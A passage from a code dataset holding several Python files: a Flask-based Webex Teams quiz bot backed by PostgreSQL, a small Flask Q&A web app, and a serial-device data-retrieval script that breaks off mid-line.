{tbscal/tbvec}')\n\n\n","sub_path":"S6/MN/Cours/src/TP3/apport_vectorisation.py","file_name":"apport_vectorisation.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"526252814","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"A simple bot script, built on Flask.\nThis sample script leverages the Flask web service micro-framework\n(see http://flask.pocoo.org/). 
By default the web server will be reachable at\nport 5000 you can change this default if desired (see `flask_app.run(...)`).\nngrok (https://ngrok.com/) can be used to tunnel traffic back to your server\nif your machine sits behind a firewall.\nYou must create a Webex Teams webhook that points to the URL where this script\nis hosted. You can do this via the WebexTeamsAPI.webhooks.create() method.\nAdditional Webex Teams webhook details can be found here:\nhttps://developer.webex.com/webhooks-explained.html\nA bot must be created and pointed to this server in the My Apps section of\nhttps://developer.webex.com. The bot's Access Token should be added as a\n'WEBEX_TEAMS_ACCESS_TOKEN' environment variable on the web server hosting this\nscript.\nThis script supports Python versions 2 and 3.\nCopyright (c) 2016-2018 Cisco and/or its affiliates.\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\"\"\"\n\n# Use future for Python v2 and v3 compatibility\nfrom __future__ import (\n absolute_import,\n division,\n print_function,\n unicode_literals,\n)\nfrom builtins import *\n\nfrom flask import Flask, request\nimport requests\nimport yaml\nimport os\nimport logging\nfrom typing import Dict, Any\n\nfrom scripts import setinitial\nfrom scripts import PSQL\nfrom scripts.tasker import Person, All_persons, Tasker\n\n\n# Initializing logger\nsetinitial.setup_logging()\n# create logger\nlogger = logging.getLogger(__name__)\n\n\n\nfrom webexteamssdk import WebexTeamsAPI, Webhook, Message, Room\n\n\nconfig = {} # create dictionary for config\ntry:\n config = setinitial.setup_config() # populate config from yaml file\nexcept yaml.YAMLError as exc:\n logger.fatal(\"Error in yaml file: \" + str(exc))\n exit(2)\nexcept IOError as exc:\n logger.fatal(\"IOError:\" + str(exc))\n exit(2)\n\n# Initialize the environment\n# Create the web application instance\nflask_app = Flask(__name__)\n# Create the Webex Teams API connection object\napi = WebexTeamsAPI( access_token=config['bot_access_token'])\n\n\n# Helper functions\n\ndef create_webhook_obj(request_json: str) -> Webhook:\n # Get the POST data sent from Webex Teams\n json_data = request_json\n logger.info(\"WEBHOOK POST RECEIVED:\")\n logger.info(json_data)\n\n # Create a Webhook object from the JSON data\n\n return Webhook(json_data)\n\ndef process_message(api: WebexTeamsAPI, message:Message, room:Room) -> str:\n try:\n psql_obj = PSQL.PSQL('ciscolive', config[\"db_host\"],\n config[\"db_login\"], config[\"db_password\"])\n except IndexError:\n logger.fatal(f'Can\\'t connect to 
Database:{config[\"db_login\"]}@{config[\"db_host\"]}/ciscolive')\n exit(2)\n\n logger.info(f'Connected to DB:{config[\"db_login\"]}@{config[\"db_host\"]}/ciscolive')\n\n\n try:\n if len(message.files) > 0:\n\n logger.error(\"Found attachment in user's input. Notifiying him that attachments are not supported\")\n\n api.messages.create(room.id, text=\"You can't send messages with attachments to me\",\n markdown=\"You can't send messages with attachments to me\")\n return 'OK'\n except TypeError:\n logger.debug(\"Not found attachment in user's input - OK\")\n\n if \"/test\" in message.text.lower():\n logger.info(\"FOUND '/test'\")\n return 'OK'\n\n\n #if \"/RERUN\" in message.text:\n # logger.info(f\"FOUND '\\/RERUN', deleting all the assigned tasks for the user: {message.personId}\")\n\n\n # return 'OK'\n\n elif \"/start\" in message.text.lower():\n logger.info(f'{message.personId}:FOUND \"/start\"')\n\n print(message.roomId)\n\n\n # check if that users exists\n if psql_obj.is_person_exists(message.personId):\n logger.info(f'{message.personId}:This is existing user')\n\n # check if that user already has task assigned\n has_task = Tasker.has_task(psql_obj,message.personId)\n\n logger.info(f'{message.personId}:That user has task? - {has_task}')\n\n if has_task:\n\n is_enough_flag = is_enough(psql_obj, message.personId)\n is_answered_flag = answer_received_for_current_task(psql_obj, message.personId)\n task_dict = {} # dictionary structure for the task\n task_dict = get_current_task(psql_obj, message.personId, has_task)\n\n if is_answered_flag and is_enough_flag:\n # If the user already completed all that tasks, we should not save answer from him\n\n logger.info(f'{message.personId}:User has already answered for all the questions. Letting him know about that')\n api.messages.create(room.id, text=message.text, markdown=\"You already answered all the tasks\")\n\n elif task_dict['files']:\n\n api.messages.create(room.id, text=\"You already have the task. Please answer it first\",\n markdown=\"You already have the task. Please answer it first\")\n\n # exception handling in case can't find attachment\n\n logger.info(f'{message.personId}:Picture path is not null,'\n f' trying to add picture as attachment:{task_dict[\"files\"]}')\n\n try:\n api.messages.create(room.id, text=\"Your current task:\",\n markdown=prepare_markdown_quiz_task(task_dict, task_dict['task_number']),\n files=task_dict['files'])\n except ValueError:\n logger.error(f'{message.personId}:Can\\'t open file to attach:{task_dict[\"files\"]}')\n\n api.messages.create(room.id,\n markdown=f'<>')\n api.messages.create(room.id, text=f\"The {task_dict['task_number']} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict,task_dict['task_number']))\n\n # If no attachment picture\n else:\n api.messages.create(room.id, text=\"You already have the task. Please answer it first\",\n markdown=\"You already have the task. 
Please answer it first\")\n\n logger.info(f'{message.personId}:Picture path is null, sending task without attachment')\n api.messages.create(room.id, text=f\"The {task_dict['task_number']} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict, task_dict['task_number']))\n\n else:\n\n logger.error(f'{message.personId}:We have that user'\n f' in persons table, but don\\'t have assigned tasks for him')\n logger.error(f'{message.personId}:Assigning task for him')\n\n #assign_new_task(api, psql_obj, room, message)\n\n task_dict = {} # dictionary structure for the task\n try:\n task_dict = assign_new_task(psql_obj, message.personId)\n except RuntimeError:\n #Error in addition to assigned_tasks table\n pass\n return 'NOK'\n except KeyError:\n #User have answered all the question that we have\n api.messages.create(room.id, text=\"You have answered all the question that we have\",\n markdown=\"You have answered all the question that we have\")\n return 'OK'\n\n if task_dict['files']:\n # exception handling in case can't find attachment\n\n logger.info(f'{message.personId}:Picture path is not null,'\n f' trying to add picture as attachment:{task_dict[\"files\"]}')\n\n try:\n api.messages.create(room.id, text=\"The {task_number} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict, task_dict['task_number']),\n files=task_dict['files'])\n except ValueError:\n logger.error(f'{message.personId}:Can\\'t open file '\n f'to attach:{task_dict[\"files\"]}')\n\n api.messages.create(room.id,\n markdown=f'<>')\n api.messages.create(room.id, text=f\"The {task_dict['task_number']} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict,task_dict['task_number']))\n\n # If no attachment picture\n else:\n logger.info(f'{message.personId}:Picture path is null, sending task without attachment')\n api.messages.create(room.id, text=f\"The {task_dict['task_number']} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict, task_dict['task_number']))\n\n\n # user does not exist, create it and assign the task\n else:\n logger.info(f'{message.personId}:This is new user')\n api.messages.create(room.id, text=\"You are new user\", markdown=\"You are **new** user\")\n\n #Creating new user\n person_name = api.people.get(message.personId).firstName\n person_surname = api.people.get(message.personId).lastName\n\n if psql_obj.add_person(message.personId,person_name,person_surname,message.personEmail):\n logger.info(f'{message.personId}:User {message.personId} created user successfully')\n #assign_new_task(api, psql_obj, room, message)\n\n\n task_dict = {} # dictionary structure for the task\n try:\n task_dict = assign_new_task(psql_obj, message.personId)\n except RuntimeError:\n #Error in addition to assigned_tasks table\n pass\n return 'NOK'\n except KeyError:\n #User have answered all the question that we have\n api.messages.create(room.id, text=\"You have answered all the question that we have\",\n markdown=\"You have answered all the question that we have\")\n return 'OK'\n\n if task_dict['files']:\n # exception handling in case can't find attachment\n\n logger.info(f'{message.personId}:Picture path is not null,'\n f' trying to add picture as attachment:{task_dict[\"files\"]}')\n\n try:\n api.messages.create(room.id, text=\"The {task_number} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict, task_dict['task_number']),\n files=task_dict['files'])\n except ValueError:\n logger.error(f'{message.personId}:Can\\'t open file to 
attach:{task_dict[\"files\"]}')\n\n api.messages.create(room.id,\n markdown=f'<>')\n api.messages.create(room.id, text=f\"The {task_dict['task_number']} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict,task_dict['task_number']))\n\n # If no attachment picture\n else:\n logger.info(f'{message.personId}:Picture path is null, sending task without attachment')\n api.messages.create(room.id, text=f\"The {task_dict['task_number']} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict, task_dict['task_number']))\n\n else:\n logger.error(f'{message.personId}:User {message.personId} creation failed')\n\n\n return 'OK'\n\n\n elif message.text in \"123456789\":\n logger.info(f'{message.personId}:FOUND \"[digit]\" in message:{message.text}')\n\n # If answer in range of the expected answers\n check_answer = check_answer_in_range(psql_obj, message.personId, int(message.text))\n\n is_enough_flag = is_enough(psql_obj, message.personId)\n is_answered_flag = answer_received_for_current_task(psql_obj, message.personId)\n\n if is_answered_flag and is_enough_flag:\n # If the user already completed all that tasks, we should not save answer from him\n\n logger.info(f'{message.personId}:User has already answered for'\n f' all the questions. Letting him know about that')\n api.messages.create(room.id, text=message.text, markdown=\"You already answered all the tasks\")\n\n\n # If user's answer is in expected range\n elif check_answer == 0:\n save_user_answer(psql_obj, message)\n\n api.messages.create(room.id, text=message.text, markdown=\"Thank you, your answer was accepted\")\n\n # Check that user has answered all questions and we need to prepare report for him\n if is_enough_flag:\n report_dict = {}\n\n api.messages.create(room.id, text=message.text, markdown=\"You have completed the interview. 
\"\n \"Preparing score for you\")\n report_dict = generate_report_dict(psql_obj, message.personId)\n\n api.messages.create(room.id, text=message.text, markdown=\"**Answered correctly:**\")\n\n for correct_answer in report_dict['correct']:\n task = Tasker.get_assigned_task_by_id(psql_obj, message.personId, correct_answer[\"task_id\"])\n\n api.messages.create(room.id, text=message.text, markdown=f'- {task[\"task\"][0:20]}<...>')\n\n\n api.messages.create(room.id, text=message.text,\n markdown=\"**Answered incorrectly [your_answer -> right answer]:**\")\n\n for wrong_answer in report_dict['wrong']:\n task = Tasker.get_assigned_task_by_id(psql_obj, message.personId, wrong_answer[\"task_id\"])\n text = f'- {task[\"task\"][0:20]}<...> [{wrong_answer[\"user_answer\"]}->{wrong_answer[\"loc_answer\"]}]'\n\n #api.messages.create(room.id, text=message.text, markdown=f'{task[\"task\"][0:20]}...')\n api.messages.create(room.id, text=message.text, markdown=text)\n\n else:\n task_dict = {} # dictionary structure for the task\n try:\n task_dict = assign_new_task(psql_obj, message.personId)\n except RuntimeError:\n #Error in addition to assigned_tasks table\n pass\n return 'NOK'\n except KeyError:\n #User have answered all the question that we have\n api.messages.create(room.id, text=\"You have answered all the question that we have\",\n markdown=\"You have answered all the question that we have\")\n return 'OK'\n\n if task_dict['files']:\n # exception handling in case can't find attachment\n\n logger.info(f'{message.personId}:Picture path is not null, '\n f'trying to add picture as attachment:{task_dict[\"files\"]}')\n\n try:\n api.messages.create(room.id, text=\"The {task_number} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict, task_dict['task_number']),\n files=task_dict['files'])\n except ValueError:\n logger.error(f'{message.personId}:Can\\'t open file to attach:{task_dict[\"files\"]}')\n\n api.messages.create(room.id,\n markdown=f'<>')\n api.messages.create(room.id, text=f\"The {task_dict['task_number']} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict,task_dict['task_number']))\n\n # If no attachment picture\n else:\n logger.info(f'{message.personId}:Picture path is null, sending task without attachment')\n api.messages.create(room.id, text=f\"The {task_dict['task_number']} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict, task_dict['task_number']))\n\n # If user doesn't have tasks assigned\n elif check_answer == -1:\n logger.info(f'{message.personId}:User does not have tasks assigned')\n api.messages.create(room.id, text=message.text, markdown=\n f'You don\\t have tasks assigned, send me /START first')\n\n # If user's answer is not in range of the expected answers\n else:\n logger.info(f'{message.personId}:User\\'s answer is not in range of '\n f'the expected answers (1 to {check_answer})')\n api.messages.create(room.id, text=message.text, markdown=f'You should answer 1 to {check_answer}')\n\n return 'OK'\n\n elif \"/repeat\" in message.text.lower():\n logger.info(f'{message.personId}:FOUND \"/repeat\"')\n\n\n\n # check if that users exists\n if psql_obj.is_person_exists(message.personId):\n logger.info(f'{message.personId}:This is existing user')\n\n\n\n\n # check if that user already has task assigned\n has_task = Tasker.has_task(psql_obj,message.personId)\n\n logger.info(f'{message.personId}:That user has task? 
- {has_task}')\n\n if has_task:\n\n is_enough_flag = is_enough(psql_obj, message.personId)\n is_answered_flag = answer_received_for_current_task(psql_obj, message.personId)\n task_dict = {} # dictionary structure for the task\n task_dict = get_current_task(psql_obj, message.personId, has_task)\n\n if is_answered_flag and is_enough_flag:\n # If the user already completed all that tasks, we should not save answer from him\n\n logger.info(f'{message.personId}:User has already answered for all the questions.'\n f' Letting him know about that')\n api.messages.create(room.id, text=message.text, markdown=\"You already answered all the tasks\")\n\n elif task_dict['files']:\n # exception handling in case can't find attachment\n\n logger.info(f'{message.personId}:Picture path is not null, '\n f'trying to add picture as attachment:{task_dict[\"files\"]}')\n\n try:\n api.messages.create(room.id, text=\"Your current task:\",\n markdown=prepare_markdown_quiz_task(task_dict, task_dict['task_number']),\n files=task_dict['files'])\n except ValueError:\n logger.error(f'{message.personId}:Can\\'t open file to attach:{task_dict[\"files\"]}')\n\n api.messages.create(room.id,\n markdown=f'<>')\n api.messages.create(room.id, text=f\"The {task_dict['task_number']} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict,task_dict['task_number']))\n\n # If no attachment picture\n else:\n logger.info(f'{message.personId}:Picture path is null, sending task without attachment')\n api.messages.create(room.id, text=f\"The {task_dict['task_number']} question for you:\",\n markdown=prepare_markdown_quiz_task(task_dict, task_dict['task_number']))\n\n else:\n\n logger.error(f'{message.personId}:We have that user in persons table, but don\\'t have tasks assigned. '\n 'Notify him about that')\n\n api.messages.create(room.id, text=\"You don't have tasks assigned\",\n markdown=\"You don't have tasks assigned\")\n\n # user does not exist, create it and assign the task\n else:\n logger.info(f'{message.personId}:This is new user, no tasks assigned. 
Notify him about that')\n api.messages.create(room.id, text=\"You don't have tasks assigned\", markdown=\"You don't have tasks assigned\")\n\n return 'OK'\n\n elif \"/help\" in message.text.lower():\n logger.info(f'{message.personId}:FOUND \"/help\"')\n\n help_str = \"**Commands supported:**\\n\" \\\n \" * /start - start quiz's process\\n\" \\\n \" * /repeat - repeat current question\\n\" \\\n \" * [1-9] - send digit to chose an answer for the question\\n\"\n\n api.messages.create(room.id, text=help_str, markdown=help_str)\n\n return 'OK'\n\n else:\n logger.error(f'{message.personId}:Not valid option {message.text}, you can send only: /START or [digits]')\n\n api.messages.create(room.id, text=\"Not valid option, you can send only: /START or [digits]\",\n markdown=\"Not valid option, you can send only: /START or [digits]\")\n return 'OK'\n\ndef get_current_task(psql_obj,person_id, task_id: int) -> dict:\n\n dict_result = {\n 'task':'',\n 'task_id':'',\n 'task_number':'',\n 'files' : [],\n 'variants' : []\n }\n\n\n all_user_tasks = Tasker.get_assigned_tasks_by_person(psql_obj, person_id)\n logger.info(f'{person_id}:All user tasks:{all_user_tasks}')\n\n task_number = len(all_user_tasks)\n\n task = Tasker.get_assigned_task_by_id(psql_obj, person_id, task_id)\n #dict_result = task\n\n dict_result['task'] = task['task']\n dict_result['task_id'] = task['id']\n dict_result['task_number'] = task_number\n dict_result['variants'] = task['variants']\n\n\n # Check whether we need to add attachment in message\n if task[\"picture_path\"]:\n # exception handling in case can't find attachment\n full_pict_path = os.path.join(config[\"pictures_folder\"], task[\"picture_path\"])\n logger.info(f'{person_id}:Picture path is not null,'\n f' trying to add picture as attachment:{full_pict_path}')\n\n dict_result['files'] = [full_pict_path]\n # If no attachment picture\n else:\n logger.info(f'{person_id}:Picture path is null, sending task without attachment')\n\n\n return dict_result\n\n\n\ndef assign_new_task(psql_obj,person_id) -> dict:\n\n dict_result = {\n 'task':'',\n 'task_id':'',\n 'task_number':'',\n 'files' : [],\n 'variants' : []\n }\n\n\n # incrementing task id in message to the customer\n\n all_user_tasks = Tasker.get_assigned_tasks_by_person(psql_obj, person_id)\n logger.info(f'{person_id}:All user tasks:{all_user_tasks}')\n\n task_number = len(all_user_tasks) + 1\n\n task = Tasker.get_random_task(psql_obj,person_id)\n\n if task:\n #dict_result['task'] = task['task']\n #dict_result['task_id'] = task['id']\n #dict_result['task_number'] = task_number\n #dict_result['variants'] = task['variants']\n\n # Check whether we need to add attachment in message\n #if task[\"picture_path\"]:\n # # exception handling in case can't find attachment\n # full_pict_path = os.path.join(config[\"pictures_folder\"], task[\"picture_path\"])\n # logger.info(f'Picture path is not null, trying to add picture as attachment:{full_pict_path}')\n\n # dict_result['files'] = [full_pict_path]\n # If no attachment picture\n #else:\n # logger.info('Picture path is null, sending task without attachment')\n\n ##return dict_result\n\n \"\"\"\n # Check whether we need to add attachment in message\n if task[\"picture_path\"]:\n # exception handling in case can't find attachment\n full_pict_path = os.path.join(config[\"pictures_folder\"],task[\"picture_path\"])\n logger.info(f'Picture path is not null, trying to add picture as attachment:{full_pict_path}')\n\n try:\n api.messages.create(room.id, text=f\"The {task_number} question for 
you:\",\n markdown=prepare_markdown_quiz_task(task,task_number),files=\n [f'{full_pict_path}'])\n except ValueError:\n logger.error(f'Can\\'t open file to attach:{task[\"picture_path\"]}')\n\n api.messages.create(room.id,markdown=f'<>')\n api.messages.create(room.id, text=f\"The {task_number} question for you:\",\n markdown=prepare_markdown_quiz_task(task, task_number))\n\n # If no attachment picture\n else:\n logger.info('Picture path is null, sending task without attachment')\n api.messages.create(room.id, text=f\"The {task_number} question for you:\",\n markdown=prepare_markdown_quiz_task(task,task_number))\n \"\"\"\n\n\n # TODO: we are not randomizing tasks' answer list now\n if Tasker.assign_task(psql_obj,person_id, task[\"id\"], task[\"answer\"]):\n logger.info(f'{person_id}:Added task to the assigned_tasks table successfully')\n else:\n logger.info(f'{person_id}:Error in addition to assigned_tasks table')\n #return False\n # raise erorr if we could not add task to PSQL table, to catch this error at the upper level\n raise RuntimeError\n\n else:\n logger.info(f'{person_id}:User have answered all the question that we have')\n raise KeyError\n #api.messages.create(room.id, text=\"You have answered all the question that we have\",\n # markdown=\"You have answered all the question that we have\")\n\n return get_current_task(psql_obj,person_id,task[\"id\"])\n #.assign_task(psql_obj,person_id, task[\"id\"], task[\"answer\"])\n\ndef save_user_answer(psql_obj,message) -> bool:\n\n # check if that user already has task assigned\n has_task = Tasker.has_task(psql_obj, message.personId)\n logger.debug(f'{message.personId}:Found current task id:{has_task}')\n\n task = Tasker.get_assigned_task_by_id(psql_obj, message.personId, has_task)\n\n if Tasker.save_user_answer(psql_obj, message.personId, task[\"id\"], message.text):\n logger.info(f'{message.personId}:Successfully saved user answer')\n return True\n else:\n logger.info(f'{message.personId}:Error saving user answer')\n return False\n\ndef is_enough(psql_obj,person_id) -> bool:\n # Check whether we need to assign next question to the user\n\n all_user_tasks = Tasker.get_assigned_tasks_by_person(psql_obj, person_id)\n logger.info(f'{person_id}:All user tasks:{all_user_tasks}')\n\n if len(all_user_tasks) >= config['tasks_num']:\n return True\n else:\n return False\n\ndef generate_report_dict(psql_obj,person_id) -> Dict:\n # Generate report for the user\n\n # creating dict for report\n dict_report = {'correct':[],'wrong':[]}\n\n all_user_tasks = Tasker.get_assigned_tasks_by_person(psql_obj, person_id)\n logger.info(f'{person_id}:All user tasks:{all_user_tasks}')\n\n dict_report['correct'] = Tasker.get_correct_answers(psql_obj, person_id)\n dict_report['wrong'] = Tasker.get_wrong_answers(psql_obj, person_id)\n\n print(dict_report)\n\n return dict_report\n\ndef check_answer_in_range(psql_obj,person_id,answer_num:int) -> int:\n\n all_user_tasks = Tasker.get_assigned_tasks_by_person(psql_obj, person_id)\n\n if len(all_user_tasks) > 0:\n\n # Get task id for the latest task\n\n task_id = all_user_tasks[0][\"task_id\"]\n logger.info(f'{person_id}:Latest task_id for the user {person_id}:{task_id}')\n\n\n task = Tasker.get_assigned_task_by_id(psql_obj, person_id, task_id)\n\n if answer_num in range(1,len(task[\"variants\"])+1):\n return 0\n else:\n return len(task[\"variants\"])\n\n else:\n # No assigned tasks found\n return -1\n\ndef answer_received_for_current_task(psql_obj,person_id) -> bool:\n # Check that we have received answer for the assigned 
task\n\n    all_user_tasks = Tasker.get_assigned_tasks_by_person(psql_obj, person_id)\n\n\n    if len(all_user_tasks) > 0:\n        # Get task id for the latest task\n\n        if all_user_tasks[0][\"user_answer\"] == None:\n            return False\n\n        else:\n            return True\n\n    else:\n        return False\n\n\n
def prepare_markdown_quiz_task(task: Dict, task_number:int) -> str:\n\n    result_str = f'The #{task_number} question for you:\\n{task[\"task\"]}\\n'\n\n    i = 1  # options' counter\n\n    for option in task[\"variants\"]:\n        result_str += f'{i}. {option}\\n'\n        i += 1\n\n    result_str += f'Choose your answer (1 to {i-1}):'\n\n    return result_str\n\n\n
# Core bot functionality\n# Your Webex Teams webhook should point to http://:5000/events\n#@flask_app.route('/events', methods=['GET', 'POST'])\n@flask_app.route('/messages', methods=['GET', 'POST'])\ndef webex_teams_webhook_messages():\n    logger.info('TEST')\n    return 'OK'\n\n
@flask_app.route('/', methods=['GET', 'POST'])\ndef webex_teams_webhook_events():\n    \"\"\"Processes incoming requests to the '/' URI.\"\"\"\n\n    if request.method == 'POST':\n        \"\"\"Respond to inbound webhook JSON HTTP POST from Webex Teams.\"\"\"\n\n\n        webhook_obj = create_webhook_obj(request.json)\n        # Get the room details\n        room = api.rooms.get(webhook_obj.data.roomId)\n        # Get the message details\n        message = api.messages.get(webhook_obj.data.id)\n        #webhook_obj.data.roomId = 'group'  # 'direct'\n        # Get the sender's details\n        person = api.people.get(message.personId)\n\n
        logger.info(\"NEW MESSAGE IN ROOM '{}'\".format(room.title))\n        logger.info(\"FROM '{}'\".format(person.displayName))\n        logger.info(\"MESSAGE '{}'\".format(message.text))\n\n
        # This is a VERY IMPORTANT loop prevention control step.\n        # If you respond to all messages... You will respond to the messages\n        # that the bot posts and thereby create a loop condition.\n        me = api.people.me()\n        if message.personId == me.id:\n            # Message was sent by me (bot); do not respond.\n            return 'OK'\n\n        else:\n            # Message was sent by someone else; parse message and respond.\n            return process_message(api, message, room)\n\n\n
if __name__ == '__main__':\n\n    \"\"\"\n    try:\n        psql_obj = PSQL.PSQL('ciscolive', config[\"db_host\"],\n                             config[\"db_login\"], config[\"db_password\"])\n    except IndexError:\n        logger.fatal(f'Can\'t connect to Database:{config[\"db_login\"]}@{config[\"db_host\"]}/ciscolive')\n        exit(2)\n\n    logger.info(f'Connected to DB:{config[\"db_login\"]}@{config[\"db_host\"]}/ciscolive')\n\n    rows = psql_obj.get_assigned_tasks()\n\n    logger.info(rows)\n    \"\"\"\n\n\n    # Start the Flask web server\n    flask_app.run(host='0.0.0.0', port=10010)","sub_path":"test2_bot.py","file_name":"test2_bot.py","file_ext":"py","file_size_in_byte":32801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"15289982","text":"from flask import Flask, request, render_template, redirect\nimport persistence\nimport logic\n\napp = Flask(__name__)\n\n
@app.route(\"/\")\n@app.route('/list', methods=[\"POST\", \"GET\"])\ndef index():\n    # item = logic.find_by_id(id)\n    list_of_headers = persistence.import_headers_from_file(\"sample_data/question.csv\")\n    list_of_dictionaries = persistence.import_data_from_file(\"sample_data/question.csv\")\n    return render_template(\"list_of_question.html\", list_of_dictionaries=list_of_dictionaries, list_of_headers=list_of_headers)\n\n
@app.route(\"/addanswer\", methods=[\"POST\"])\ndef addanswer():\n    return render_template(\"addanswer.html\")\n\n
@app.route(\"/addquestion\", methods=['POST','GET'])\ndef addquestion():\n    if request.method == \"POST\":\n        return render_template('addquestion.html')\n    elif request.method == \"GET\":\n        return redirect('/')\n\n
# @app.route(\"/question/\")\n# def question(id):\n#     return render_template(\"question.\")\n\n
@app.route(\"/question/<question_id>/delete\", methods=['GET', 'POST'])\ndef delete_question(question_id):\n    logic.delete_by_id(\"q\", question_id)\n    return redirect('/')\n\n
@app.route(\"/answer/<answer_id>/delete\", methods=['GET', 'POST'])\ndef delete_answer(answer_id):\n
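    # delete a single answer; logic.delete_by_id(kind, id) is called with \"q\" for questions and \"a\" for answers (mirroring delete_question above)\n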
logic.delete_by_id(\"a\", question_id)\n return redirect('/')\n\n\nif __name__ == \"__main__\":\n app.run(debug=True,\n port = 5001)","sub_path":".history/server_20180531182013.py","file_name":"server_20180531182013.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"339340585","text":"#! /usr/bin/env python\n\"\"\"!\n\n\"\"\"\n__author__ = \"Ben Johnston\"\n__revision__ = \"0.1\"\n__date__ = \"\"\n__license__ = \"GPL v2.0\"\n\n##IMPORTS#####################################################################\nimport pickle\nimport sys\nimport pdb\n##############################################################################\nacknowledge = 'OK\\n'\n\n\ndef pair_device(device, logger):\n acknowledge = 'OK\\n'\n #The first message to be received is \"Pairing\"\n while 1:\n response = device.readline()\n logger.info('From device @%s: %s' % (device.port, response))\n if response.find('Pairing\\r\\n') >= 0:\n break\n\n #Wait for receipt of paired message\n while 1:\n device.write(acknowledge)\n logger.info('To device @%s: %s' % (device.port, acknowledge))\n response = device.readline()\n logger.info('From device @%s: %s' % (device.port, response))\n if response.find('Paired\\r\\n') >= 0:\n break\n\n\ndef handle_tasks(device, logger, debug_level):\n task_list = {'1': 'new_test',\n '2': 'retrieve_test',\n '3': 'restart'}\n tasks = ''\n response = '\\r'\n while response != '':\n response = device.readline()\n tasks += response\n logger.info('From device @%s: %s' % (device.port, response))\n print (tasks.strip())\n\n #Get user selection\n selection = ''\n while not (selection in task_list.keys()):\n selection = raw_input('Selection: ')\n device.write(task_list[selection] + '\\n')\n\n return int(selection)\n\n\ndef wait_for_test(device, logger, debug_level):\n if debug_level == 0:\n sys.stdout.flush()\n sys.stdout.write('\\rCollecting data')\n\n #Wait for data to be ready for receipt\n while 1:\n ##Update counter waiting for data\n if debug_level == 0:\n sys.stdout.flush()\n sys.stdout.write('.')\n\n response = device.readline()\n logger.info('From device @%s: %s' % (device.port, response))\n if response.find('Error') >= 0:\n return -1\n elif response.find('Done') >= 0:\n return 0\n elif response.find('collected') >= 0:\n print('Data Collected')\n return 1\n\n\ndef retrieve_data(device, logger, debug_level):\n #Get the test data to retrieve\n response = device.readline()\n if debug_level > 0:\n logger.info('From device @%s: %s' % (device.port, response))\n else:\n if response != '':\n print(response)\n #Get the upper limit of available tests\n upper_lim = int(response[0:response.find('test(s) available to read')])\n test_selection = -1\n #Get the input from the user\n while 1:\n try:\n test_selection = int(raw_input('Test Selection: '))\n logger.info('From device @%s: %s' % (device.port, response))\n if (test_selection < 0) or (test_selection > upper_lim):\n print(\"Enter a number greater than or equal to 0\")\n elif (test_selection >= 0) and (test_selection <= upper_lim):\n device.write(str(test_selection) + '\\n')\n return None\n except ValueError:\n print(\"Please enter a number greater than 0\")\n\n #Send the test selection\n device.write(str(test_selection) + '\\n')\n response = device.readline()\n while response.find('Ready for data?') < 0:\n response = device.readline()\n logger.info('From device @%s: %s' % (device.port, response))\n device.write(acknowledge)\n #Wait to get the number of blocks to 
read\n while response.find('Blocks to read') < 0:\n response = device.readline()\n logger.info('From device @%s: %s' % (device.port, response))\n\n #Get the total of number of blocks for the system\n block_counter = int(response.split(',')[1])\n #Create a blank string to store all data\n data = ''\n\n for i in range(block_counter):\n sys.stdout.flush()\n sys.stdout.write('\\rRetrieving data block %d/%d' %\n (i + 1, block_counter))\n #Get the first block\n response = device.readline()\n logger.info('From device @%s: %s' % (device.port, response))\n if response.find('Error') >= 0:\n sys.exit(0)\n elif response.find('Done') >= 0:\n break\n elif response.find('Data for block') >= 0:\n response = device.readline()\n logger.info('From device @%s: %s' % (device.port, response))\n data += response.strip('\\r\\n').strip(' ')\n return data\n\n\ndef process_sd_data(data=None, channels=[1, 2, 3]):\n if data is None:\n return None\n #Create a copy of the data\n data_copy = data.strip('\\r\\n').split(',')\n #Generate blank dictionary for channels\n processed_data = {}\n for channel in channels:\n processed_data[channel] = []\n\n i = 0\n while i < (len(data_copy) - 1):\n processed_data[int(data_copy[i])].append(int(data_copy[i + 1]))\n i += (len(channels) - 1)\n\n #Return the dictionary of data\n return processed_data\n\n\ndef write_sd_to_file(processed_data=None, file_name='sd_data.csv'):\n if processed_data is None:\n return None\n\n number_of_data_points = []\n for channel in processed_data.keys():\n number_of_data_points.append(len(processed_data[channel]))\n number_of_data_points = min(number_of_data_points)\n with open(file_name, 'w') as f:\n for channel in processed_data.keys():\n f.write('%d,' % channel)\n f.write('\\n')\n for row in range(number_of_data_points):\n for channel in processed_data.keys():\n f.write('%d,' % processed_data[channel][row])\n f.write('\\n')\n\ndata = pickle.load(open('data.pk', 'r'))\n\nprocessed_data = 